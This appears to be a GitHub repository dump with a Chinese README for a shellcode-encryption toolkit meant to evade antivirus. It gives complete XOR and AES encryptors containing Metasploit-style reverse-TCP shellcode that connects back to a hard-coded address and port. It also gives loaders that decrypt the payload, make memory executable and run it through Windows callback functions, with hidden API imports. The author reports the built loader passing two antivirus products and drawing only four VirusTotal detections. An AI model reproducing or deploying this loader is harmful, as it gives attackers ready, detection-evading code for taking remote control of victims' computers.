├── .gitignore
├── Debug
├── aes加密.exe
└── aes加密.pdb
├── README.md
├── README
├── image-20230515195113865.png
├── image-20230515195404012.png
├── image-20230515201325408.png
├── image-20230515201541815.png
├── image-20230516154122994.png
├── image-20230516154853419.png
└── image-20230516155107883.png
├── Shellcode加密库
├── AES.cpp
├── AES.h
├── Base64.cpp
├── Base64.h
├── Shellcode加密库.cpp
├── Shellcode加密库.h
├── Shellcode加密库.vcxproj
├── Shellcode加密库.vcxproj.filters
├── Shellcode加密库.vcxproj.user
└── x64
│ ├── Debug
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode加密库.Build.CppClean.log
│ ├── Shellcode加密库.lib.recipe
│ ├── Shellcode加密库.log
│ ├── Shellcode加密库.obj
│ ├── Shellcode加密库.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── Lib-link.read.1.tlog
│ │ ├── Lib-link.write.1.tlog
│ │ ├── Lib.command.1.tlog
│ │ └── Shellcode加密库.lastbuildstate
│ └── Shellcode加密库.vcxproj.FileListAbsolute.txt
│ └── Release
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode加密库.Build.CppClean.log
│ ├── Shellcode加密库.lib.recipe
│ ├── Shellcode加密库.log
│ ├── Shellcode加密库.obj
│ ├── Shellcode加密库.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Lib-link.read.1.tlog
│ ├── Lib-link.write.1.tlog
│ ├── Lib.command.1.tlog
│ └── Shellcode加密库.lastbuildstate
│ └── Shellcode加密库.vcxproj.FileListAbsolute.txt
├── aes加密
├── Debug
│ ├── Base64.obj
│ ├── aes.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.ilk
│ ├── aes加密.log
│ ├── aes加密.obj
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── encrypt_shellcode.obj
│ ├── lazy_importer.obj
│ ├── vc143.idb
│ └── vc143.pdb
├── Release
│ ├── AES.obj
│ ├── Base64.obj
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.log
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ └── unsuccessfulbuild
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ └── vc143.pdb
├── Shellcode_AesDecrypt.cpp
├── Shellcode_AesEncrypt.cpp
├── aes加密.vcxproj
├── aes加密.vcxproj.filters
├── aes加密.vcxproj.user
├── lazy_importer.cpp
├── lazy_importer.hpp
├── shellcode.txt
├── test.txt
└── x64
│ ├── Debug
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.ilk
│ ├── aes加密.log
│ ├── aes加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── aes加密.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ ├── vc143.idb
│ ├── vc143.pdb
│ └── vcpkg.applocal.log
│ └── Release
│ ├── Shellcode_AesDecrypt.obj
│ ├── Shellcode_AesEncrypt.obj
│ ├── aes加密.Build.CppClean.log
│ ├── aes加密.exe.recipe
│ ├── aes加密.iobj
│ ├── aes加密.ipdb
│ ├── aes加密.log
│ ├── aes加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── Masm.read.1u.tlog
│ ├── Masm.write.1u.tlog
│ ├── aes加密.lastbuildstate
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ └── link.write.1.tlog
│ ├── aes加密.vcxproj.FileListAbsolute.txt
│ ├── lazy_importer.obj
│ ├── syscalls-asm.x64.obj
│ ├── syscalls.obj
│ ├── vc143.pdb
│ └── vcpkg.applocal.log
├── rsa加密
├── applink.c
├── libcrypto-3-x64.dll
├── main.cpp
├── private.pem
├── public.pem
├── rsa加密.vcxproj
├── rsa加密.vcxproj.filters
├── rsa加密.vcxproj.user
└── x64
│ ├── Debug
│ ├── applink.obj
│ ├── main.obj
│ ├── rsa加密.Build.CppClean.log
│ ├── rsa加密.exe.recipe
│ ├── rsa加密.ilk
│ ├── rsa加密.log
│ ├── rsa加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ ├── link.write.2u.tlog
│ │ └── rsa加密.lastbuildstate
│ ├── rsa加密.vcxproj.FileListAbsolute.txt
│ ├── vc143.idb
│ └── vc143.pdb
│ └── Release
│ ├── applink.obj
│ ├── rsa加密.Build.CppClean.log
│ ├── rsa加密.exe.recipe
│ ├── rsa加密.log
│ ├── rsa加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── rsa加密.lastbuildstate
│ └── unsuccessfulbuild
│ ├── rsa加密.vcxproj.FileListAbsolute.txt
│ └── vc143.pdb
├── shellcode加密.sln
├── x64
├── Debug
│ ├── Shellcode加密库.idb
│ ├── Shellcode加密库.lib
│ ├── Shellcode加密库.pdb
│ ├── aes加密.exe
│ ├── aes加密.pdb
│ ├── rsa加密.exe
│ ├── rsa加密.exp
│ ├── rsa加密.lib
│ ├── rsa加密.pdb
│ ├── xor加密.exe
│ └── xor加密.pdb
└── Release
│ ├── Shellcode加密库.lib
│ ├── Shellcode加密库.pdb
│ ├── aes加密.exe
│ ├── aes加密.pdb
│ ├── xor加密.exe
│ └── xor加密.pdb
└── xor加密
├── Shellcode_XorEncoder.py
├── x64
├── Debug
│ ├── vc143.idb
│ ├── vc143.pdb
│ ├── xor加密.Build.CppClean.log
│ ├── xor加密.exe.recipe
│ ├── xor加密.ilk
│ ├── xor加密.log
│ ├── xor加密.obj
│ ├── xor加密.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── link.write.1.tlog
│ │ └── xor加密.lastbuildstate
│ └── xor加密.vcxproj.FileListAbsolute.txt
└── Release
│ ├── vc143.pdb
│ ├── vcpkg.applocal.log
│ ├── xor加密.Build.CppClean.log
│ ├── xor加密.exe.recipe
│ ├── xor加密.iobj
│ ├── xor加密.ipdb
│ ├── xor加密.log
│ ├── xor加密.obj
│ ├── xor加密.tlog
│ ├── CL.command.1.tlog
│ ├── CL.read.1.tlog
│ ├── CL.write.1.tlog
│ ├── link.command.1.tlog
│ ├── link.read.1.tlog
│ ├── link.write.1.tlog
│ └── xor加密.lastbuildstate
│ └── xor加密.vcxproj.FileListAbsolute.txt
├── xor加密.cpp
├── xor加密.vcxproj
├── xor加密.vcxproj.filters
└── xor加密.vcxproj.user
/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/
--------------------------------------------------------------------------------
/Debug/aes加密.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Debug/aes加密.exe
--------------------------------------------------------------------------------
/Debug/aes加密.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/Debug/aes加密.pdb
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # 前言
2 |
3 | ## 什么是私钥和公钥
4 |
5 | 私钥和公钥是密码学中用于实现加密、解密和数字签名等功能的关键组件。
6 |
7 | 私钥是一种加密算法中的秘密密钥,只有密钥的拥有者可以访问和使用它。私钥通常用于数字签名和数据加密等场景中,它可以用于对数据进行加密,同时也可以用于解密已经被加密的数据。
8 |
9 | 公钥是与私钥对应的一种公开密钥,它可以被任何人访问和使用。公钥通常用于数据加密、身份认证和数字签名等场景中。公钥可以被用来加密数据,同时也可以用于验证数字签名的有效性。
10 |
11 | 在非对称加密算法中,公钥和私钥是一对密钥,它们共同参与加密和解密过程。公钥用于加密数据,而私钥用于解密数据。因此,使用非对称加密算法时,数据的接收方会将其私钥保存为秘密,而将其公钥发送给发送方。这样,发送方就可以使用接收方的公钥来加密数据,而接收方可以使用其私钥来解密数据。
12 |
13 | 需要注意的是,私钥和公钥是成对出现的,它们必须同时使用才能确保数据的安全性和完整性。因此,在使用私钥和公钥进行数据加密、解密和数字签名等操作时,必须确保私钥的安全性和保密性
14 |
15 |
16 |
17 |
18 | ## 了解对称加密和非对称加密
19 |
20 | - 对称加密:在对称加密中,加密和解密使用的是同一个密钥,通常称为共享密钥。这意味着在加密数据时,发送方和接收方都需要使用相同的密钥。对称加密算法的速度较快,适用于对大量数据进行加密。然而,对称加密的一个主要缺点是密钥管理。由于发送方和接收方需要使用相同的密钥,因此密钥的安全传输和存储成为一个挑战。一旦密钥被泄露,加密数据的安全性就会受到威胁。常见的对称加密算法有:AES(高级加密标准)、DES(数据加密标准)和3DES(三重数据加密标准)。
21 | - 非对称加密:非对称加密使用一对密钥,分别称为公钥和私钥。公钥是公开的,可以被任何人获取,而私钥是保密的,只有密钥所有者才能访问。在非对称加密中,数据可以用公钥加密,然后只能用相应的私钥解密;反之亦然,用私钥加密的数据只能用公钥解密。这样,密钥的管理问题得到了解决,因为只需要保护私钥的安全。非对称加密的一个缺点是加密和解密过程相对较慢,因此通常不适用于加密大量数据。常见的非对称加密算法有:RSA(Rivest-Shamir-Adleman)、DSA(数字签名算法)和ECC(椭圆曲线密码学)。
22 |
23 | 在实际应用中,对称加密和非对称加密通常会结合使用,以充分利用两者的优点。例如,通过非对称加密安全地传输对称加密的密钥,然后使用对称加密对数据进行加密。这样既解决了密钥管理问题,又能快速地加密大量数
24 |
25 |
26 |
27 |
28 | # XOR加密
29 |
30 | ## 什么是xor加密
31 |
32 | XOR加密又称为异或加密,异或加密属于对称加密。在异或加密中,使用一个密钥(通常称为密钥流)与明文数据进行异或操作,生成加密后的密文。解密过程与加密过程相同,将密文与相同的密钥流进行异或操作,即可恢复原始明文数据
33 |
34 |
35 |
36 |
37 | ## 代码实现
38 |
39 | 使用`Shellcode_XorEncoder.py`对shellcode进行异或加密,随后输出加密后的shellcode
40 |
41 | ```python
42 | # 定义异或加密函数,接收原始shellcode和密钥作为输入
43 | def xor_encrypt(shellcode, key):
44 | encrypted_shellcode = bytearray()
45 | key_len = len(key)
46 |
47 | # 遍历shellcode中的每个字节
48 | for i in range(len(shellcode)):
49 | # 将当前字节与密钥中相应字节进行异或操作,然后添加到加密后的shellcode中
50 | # 这段代码中的i % key_len操作用于确保在对shellcode进行异或加密时,密钥循环使用
51 | encrypted_shellcode.append(shellcode[i] ^ key[i % key_len])
52 | return encrypted_shellcode
53 |
54 | def main():
55 | # msf生成的shellcode
56 | buf = b""
57 | buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51"
58 | buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
59 | buf += b"\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72"
60 | buf += b"\x50\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48\x31\xc0"
61 | buf += b"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
62 | buf += b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b"
63 | buf += b"\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
64 | buf += b"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48"
65 | buf += b"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44"
66 | buf += b"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x4d\x31\xc9\x48"
67 | buf += b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48\x31\xc0"
68 | buf += b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
69 | buf += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44"
70 | buf += b"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
71 | buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
72 | buf += b"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
73 | buf += b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
74 | buf += b"\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49"
75 | buf += b"\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49"
76 | buf += b"\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
77 | buf += b"\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
78 | buf += b"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07"
79 | buf += b"\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
80 | buf += b"\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50"
81 | buf += b"\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
82 | buf += b"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf"
83 | buf += b"\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
84 | buf += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
85 | buf += b"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00"
86 | buf += b"\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
87 | buf += b"\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8"
88 | buf += b"\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20"
89 | buf += b"\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00"
90 | buf += b"\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4"
91 | buf += b"\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
92 | buf += b"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba"
93 | buf += b"\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
94 | buf += b"\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00"
95 | buf += b"\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41"
96 | buf += b"\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c"
97 | buf += b"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6"
98 | buf += b"\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
99 | buf += b"\xf0\xb5\xa2\x56\xff\xd5"
100 |
101 | shellcode = bytearray(buf)
102 |
103 | # 定义密钥
104 | key = bytearray(b'henry')
105 |
106 | # 使用xor_encrypt函数加密shellcode
107 | encrypted_shellcode = xor_encrypt(shellcode, key)
108 |
109 | # 输出加密后的shellcode
110 | print("Encrypted shellcode:")
111 | encrypted_shellcode_string = ""
112 | for byte in encrypted_shellcode:
113 | encrypted_shellcode_string += ("\\x%02x"%byte)
114 | print(encrypted_shellcode_string)
115 |
116 | if __name__ == '__main__':
117 | main()
118 |
119 | ```
120 |
121 |
122 |
123 |
124 | 使用`xor加密.cpp`解密加密后的shellcode,随后将其加载进内存
125 |
126 | ```cpp
127 | #include
128 | #include
129 |
130 | int main() {
131 | // 存放xor加密后的shellcode
132 | char encryptedShellcode[] = "...";
133 |
134 | // 定义解密所用的密钥
135 | char key[] = "henry";
136 |
137 | // 定义一个与加密shellcode大小相同的数组用于存储解密后的shellcode
138 | unsigned char shellcode[sizeof encryptedShellcode];
139 |
140 | // 获取密钥的长度
141 | int keylength = strlen(key);
142 |
143 | // 遍历加密的shellcode,并使用异或操作进行解密,将结果存储在shellcode数组中
144 | for (int i = 0; i < sizeof encryptedShellcode; i++) {
145 | shellcode[i] = encryptedShellcode[i] ^ key[i % keylength];
146 | printf("\\x%x", shellcode[i]);
147 | }
148 |
149 | // 获取解密后的shellcode的地址
150 | char* addrShellcode = (char*)shellcode;
151 |
152 | // 声明一个DWORD变量用于存储旧的内存保护属性
153 | DWORD dwOldPro = 0;
154 |
155 | // 更改解密后的shellcode所在内存区域的保护属性,允许执行、读、写
156 | BOOL ifExec = VirtualProtect(addrShellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &dwOldPro);
157 |
158 | // 使用EnumUILanguages函数执行解密后的shellcode
159 | EnumUILanguages((UILANGUAGE_ENUMPROC)addrShellcode, 0, 0);
160 | }
161 | ```
162 |
163 |
164 |
165 |
166 | # AES加密
167 |
168 | ## 什么是aes加密
169 |
170 | AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中
171 |
172 | AES加密的特点如下:
173 |
174 | - 对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
175 | - 密钥长度:AES支持128位、192位和256位三种密钥长度,安全性随密钥长度的增加而增加。
176 | - 分组长度:AES加密算法对数据进行分组,每个分组固定为128位(16字节)。
177 | - 加密过程:包括多轮(轮数与密钥长度有关,如AES-128需要10轮,AES-192需要12轮,AES-256需要14轮)的加密操作。每轮操作包括四个步骤:SubBytes(字节替换)、ShiftRows(行移位)、MixColumns(列混淆,最后一轮除外)和AddRoundKey(轮密钥加)
178 |
179 |
180 |
181 |
182 | ## 代码实现
183 |
184 | 这里直接使用乌鸦师傅的aes加密代码:https://cloud.tencent.com/developer/article/1939317,我将aes加密的函数封装在一个静态链接库项目里,再添加了密钥生成函数和shellcode数组转字符串函数,一共有四个函数
185 |
186 | ```cpp
187 | //AES加密
188 | string EncryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
189 |
190 | //AES解密
191 | string DecryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
192 |
193 | //生成随机密钥
194 | string random_string(size_t length);
195 |
196 | //将char类型的shellcode转换成string类型的
197 | string toHexString(unsigned char* data, size_t len);
198 | ```
199 |
200 |
201 |
202 |
203 | `Shellcode_AesEncrypt.cpp`对shellcode进行Aes加密
204 |
205 | ```cpp
206 | #include
207 | #include "Shellcode加密库.h"
208 |
209 | using namespace std;
210 |
211 | int main() {
212 |
213 | //填写msf或cs生成的shellcode
214 | unsigned char buf[] =
215 | "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
216 | "\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x51"
217 | "\x48\x8b\x52\x20\x56\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
218 | "\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
219 | "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
220 | "\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
221 | "\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
222 | "\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
223 | "\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6"
224 | "\x4d\x31\xc9\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
225 | "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
226 | "\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
227 | "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
228 | "\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
229 | "\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
230 | "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
231 | "\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
232 | "\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
233 | "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
234 | "\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
235 | "\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
236 | "\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
237 | "\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
238 | "\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
239 | "\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
240 | "\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
241 | "\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
242 | "\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
243 | "\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
244 | "\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
245 | "\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
246 | "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
247 | "\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
248 | "\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
249 | "\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
250 | "\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
251 | "\xf0\xb5\xa2\x56\xff\xd5";
252 |
253 |
254 | //生成随机16位的key值和iv值
255 | srand(time(0)); // initialize random seed
256 | string g_key = random_string(16);
257 | string g_iv = random_string(16);
258 | cout << "key值: " << g_key << endl;
259 | cout << "iv值: " << g_iv <
278 |
279 | `Shellcode_AesDecrypt.cpp`用来解密shellcode并加载,此处还调用了lazy_importer库的函数:https://github.com/JustasMasiulis/lazy_importer,此库实现动态调用系统api函数, 只需在函数前面添加(`LI_FN`), 若此函数的某个参数需填`NULL`, 那么需要改成`nullptr`
280 |
281 | ```cpp
282 | #define _CRT_SECURE_NO_DEPRECATE
283 | #include
284 | #include "lazy_importer.hpp"
285 | #define BUF_SIZE 4096
286 | #include
287 | #include "Shellcode加密库.h"
288 |
289 | using namespace std;
290 | char g_key[17] = "M7N@ExCVB@dFd]3W"; //填写key密钥
291 | char g_iv[17] = "}%?#U)6;9#uOg6gL"; //定义iv向量
292 |
293 |
294 | void main(int argc, char* argv[])
295 | {
296 | // 加密后的shellcode
297 | string buf = "Zq3ejgFVl/qtP/dqcQidBN6BKWTiL/KZZpfW+Iy8ZMnaA4Au2oEHMltr8TihG9yvvQ1MDt0PFqboWsF5ka9y72L9xJ5a4HRBFspK3vMwvtKMH8Xtko6ErmfUUB8pv4n4DybjQseeuYtPqEDGvX8zlwONk9nyu5r8aozfNCxLvnbFyzX5OLInbra87Az3FGhilZnCwMufIPZLgolhRkgyhnS96CsMst/pNz4AqcCNmfe7Gw1rcuVgHqETNxwIsNzWDmUguUJ173NHAZJpKmF1k39IYnF4JMvVk3QH81jzX68ClhGvADXnPlmz20PHzzjKOzkovpW4cPT3Q/1B2HOwWwhKPZdLKakJeuSa1YLwv6Nu3UdP8II6dGDVsgb4y/U7O1aiHbJFXSM5XXx7eKqTe8MV8gLfwNNR6M4qaWEm7XmdsE0WryhL5F1SFe/6uxPrcIFnGE3I0jVntLjYfVWotkkrEgL7M6rXlOgKHF3Pd6AIIPm23zULA9NyJsHuKmqOUgyzf7LiPxPcIqhNo5DA1opqCqBS3XTeusUjr6x3AyBT9MquUeJKuB7BBtWJWyuQzTzzSXaDRmErc6lSTM+DKTo101TZYKz4Jl2I8xDMey7IJT+Z1iYt/thgi1FeRLnrGAFKhNn3xAqjYORcKXLPGkSWq1MoZZxOJi6QF1uqMlB3tDBD6w/pAhuqHR+ZxnaHjfbqybG8rNLXc6hshmazoiFakC9QwHM9RgyVde9GGpkNr+wzjp1Tc1SbXSHtFHXumU1IP6NvLqU0/tWrTui9t8nrsqNFgGlQUXyAzmnk04vXJeD7kxGbSFSXwffPGUlOtDS1q/+P+fwj+ZvjpmiPLzoo+hgZ0UOtyO1ThltWr4rWitqMPneleC11qlVcyOp0odOTxuZiUeJyTOY9wHWwXg3snVWat23VSE7eQ4QWcF/GtfRVBsiGGENo1hH1nuxNTlEx/2os30f3IOj/yUfIXpuwHaWsNwlyw6119Z3PgCOdR+1qDCvJenZEsCkyjUJ830xC1V5VxCw1m0btTP+LaefsNEocc5V7fyNyaw0o72yl/g+bacycAbG/hIJlWbaXneDFysBLPtLFJjXm0gAsE3iyffdB9l6c8ffohInaNlWC8x7IDb4X6vrFC8cncDFb3NKIInVFR6bmqXfxXAamxzKXdpVjngPZg6YCWpTUtobZhThnhpO1KZxvHoFCcidxLq+mifWHpcldcS/ez2vWGdriSbd6i9FGGaxQQvHze1HmaLP/sj34JDMfIVfOI2/4sejnjluKfhcu5I0P76idHJKMDHr+rJBtpSxX3jc+UNlfeFmhjuN2Yy/TO1kLRfUdfAeZP2Vz4WhITdRf8bvqJA==";
298 | // 解密shellcode
299 | string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);
300 |
301 | //将解密的shellcode放到shellcode数组中
302 | char* p = (char*)strbuf.c_str();
303 | unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));
304 | for (size_t i = 0; i < strbuf.length() / 2; i++) {
305 | sscanf(p, "%02x", &shellcode[i]);
306 | p += 2;
307 | }
308 |
309 | //输出shellcode数组里的内容
310 | int ShellcodeSize = strbuf.length() / 2;
311 | printf("Decrypted buffer:\n");
312 | for (int i = 0; i < ShellcodeSize; i++) {
313 | printf("\\x%02x", shellcode[i]);
314 | }
315 |
316 | //加载shellcode
317 | char* orig_buffer;
318 | orig_buffer = (char*)LI_FN(VirtualAlloc)(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
319 |
320 | RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
321 |
322 | //使用EnumUILanguages函数执行解密后的shellcode
323 | //EnumUILanguages((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
324 |
325 | //LI_FN(EnumUILanguages)((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
326 |
327 | //使用EnumFontsW回调函数加载shellcode
328 | EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
329 |
330 | }
331 | ```
332 |
333 |
334 |
335 |
336 | ## 运行测试
337 |
338 | 给aes加密项目添加引用,选择Shellcode加密库
339 |
340 | 
341 |
342 |
343 |
344 |
345 | 修改项目属性,在附加包含目录处添加上Shellcode加密库项目的路径
346 |
347 | 
348 |
349 |
350 |
351 |
352 | 使用`Shellcode_AesEncryption.cpp`进行加密, 随后控制台输出key值、iv值、以及加密后的shellcode
353 |
354 | 
355 |
356 |
357 |
358 |
359 | 打开`Shellcode_AesDecrypt.cpp`,填写上述生成的值, 随后生成可执行文件
360 |
361 | 
362 |
363 |
364 |
365 |
366 | 将生成的可执行文件放到火绒和360里测试,没有发现报毒
367 |
368 | 
369 |
370 | 
371 |
372 |
373 |
374 | 上传至VirusTotal检查,只有四个报毒,免杀效果还是可以的
375 |
376 | 
377 |
378 |
379 |
380 |
381 | # Git项目地址
382 |
383 | https://github.com/xf555er/ShellcodeEncryption
--------------------------------------------------------------------------------
/README/image-20230515195113865.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515195113865.png
--------------------------------------------------------------------------------
/README/image-20230515195404012.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515195404012.png
--------------------------------------------------------------------------------
/README/image-20230515201325408.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/README/image-20230515201325408.png
--------------------------------------------------------------------------------
/README/image-20230515201541815.png:
